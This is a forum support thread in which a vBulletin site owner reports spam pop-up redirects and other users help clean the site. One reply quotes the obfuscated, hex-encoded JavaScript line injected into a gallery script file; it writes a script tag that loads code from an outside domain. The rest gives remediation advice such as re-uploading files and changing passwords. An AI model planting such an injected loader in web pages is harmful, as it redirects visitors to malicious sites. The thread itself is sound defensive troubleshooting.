Hi all,

I just updated to the latest vbulletin version because there seem to be some tricky hack on my board that redirects users to spammy websites by just clicking anywhere on the page ( http://www.sims4ever.de/forum.php ) or by just waiting some seconds (tested in chrome) for the popup to appear. After updating the problem were solved but few days later the popups are back again. Is there any known vulnerability in vbulletin 4.2.5. Alpha 3 that enables hackers to do stuff like this? How could I fix it?

This is an URL of one of the popups that appear:
https://inabsolor.com/12?rnd=2318547871&z=3391262&b=6718071&c=3621659&var=&d=https%3A%2F%2Fwww.nutaku.net%2Fsignup%2Flanding% 2Fbooty-calls%2F7%2F%3Fats%3DeyJhIjoyOTM2OTAsImMiOjU4OTc1N Dc3LCJuIjoxLCJzIjoxLCJlIjo4NTA4LCJwIjozMTh9%26apb% 3D%24%7BSUBID%7D%26atc%3D%7Bzoneid%7D&cln=1&btp=7&rb=H0Bgq0MqLYimmzvjbBLIo6JEpBhzxikryPgwmUuoh3RVSsQ gp0kz9z7Ku4k_4UubpGjWbdyGLsfKGN_94ktgf2k07DiVTNHRM wmtAV6M5pk_DiLav-30mBIRyrXEHQXAM_0fJtEYn1l1yzeCAl6v3Tx4dzqfN6vN8RM_ CARDhsiOYreRm6pjn4cffz-BAwUhpuxcXlsLdVdlUyEh7SlvTSLOntivfxM5_Yu3HNNhwcJUO kBkg0-mBdWieHQnAYuDJZ6GgqQ-6m8Sqnlks2DQiQ==&bag=far3cbNSBH4=&ruid=1cd80947-3c0b-4a35-859f-b5ee50a849fc&ng=1&ix=0&pt=0&np=0&gp=3&bp=4&nw=0&nb=1&sw=1920&sh=1080&pl=http%3A%2F%2Fwww.sims4ever.de%2Fsims4ever-de-inside%2F1931-datenschutzerklaerung.html%23post33481&wy=0&wx=0&ww=1920&wh=1040&cw=1903&wiw=1920&wih=937&wfc=5&sah=1040&drf=http%

Example content of popup:
https://i.imgur.com/dvyEe1z.png

There's malicious JavaScript injected into the file http://www.sims4ever.de/highslide/highslide-with-gallery.js on the very last line.

var _0x4438=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x 22\x68\x74\x74\x70\x3A\x2F\x2F\x62\x65\x73\x74\x69 \x2E\x67\x61\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x 74\x3E","\x77\x72\x69\x74\x65"];var _0x71be=[_0x4438[0],_0x4438[1]];var _0x6675=[_0x71be[0],_0x71be[1]];document[_0x6675[1]](_0x6675[0])

https://i.imgur.com/MKlZMi4.png

Remove that from the file, clear the cache and you should hopefully be fine.

Thank you Dave, it seems to fix the issue. But I am still not sure how the attacker could infect this file.

I would start at checking your directory permissions first.
Also it has been 4 years since that software was updated.
I did find notices of of an exploit.

https://www.securityfocus.com/bid/39239

The latest version is 4.2.5 as far as I know.

And the hacker was on my site again. He changed
clientscript/vbulletin_read_marker.js

and I don't know how.
The "file last changed date" in my FTP Client says that this file has not been touched for long time.
I already added directory protection for admin panel.

Anything else I could do to prevent this hacker to change files on my website?
Permissions seem to be correct (0644)

Sorry, you had mentioned v4.2.5 Alpha 3 That is a pre-beta release and as noted 4.2.5 was publicly released as the final version in the 4 series. Please make sure you are running 4.2.5

This can be tricky as the attacker could have uploaded/placed a back door file.

I would re-upload ALL core files
Reupload ALL plugin files and make sure you have their latest releases..
I would do a folder by folder comparison of ALL files making sure they are all valid and a backdoor file is not hiding.
Change your FTP password as well as any other accounts that would have this level of access.
Change ALL admin passwords of the VB site.
Check the file/folder permissions based on the recommendations by VB.

vBulletin also has a tool to help identify out of date files:
ACP > Plugins & Products > Check ALL versions.

Time stamps are easily manipulated and you should not rely on them:
https://www.sitelock.com/blog/this-week-in-exploits-timestamps-look-but-dont-touch/